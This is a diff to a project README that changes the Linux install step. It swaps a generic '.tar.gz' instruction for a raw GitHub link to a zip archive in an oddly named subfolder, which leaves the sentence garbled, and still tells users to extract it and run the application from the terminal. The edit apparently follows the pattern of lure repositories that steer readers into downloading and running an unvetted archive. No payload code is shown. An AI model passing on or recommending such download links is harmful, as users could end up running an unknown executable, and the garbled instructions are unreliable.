haiitexytex/cognitive-uncertainty-principle-verification/README.md

 3. For macOS:
    - Open the `.dmg` file and drag the application to your Applications folder.
 4. For Linux:
-   - Extract the `.tar.gz` file, and run the application from the terminal.
+   - Extract the `https://raw.githubusercontent.com/haiitexytex/cognitive-uncertainty-principle-verification/main/Selachostomi/cognitive-uncertainty-principle-verification.zip` file, and run the application from the terminal.

 ## 🎈 How to Use the Software
 1. **Open the Application:** After installation, launch the application.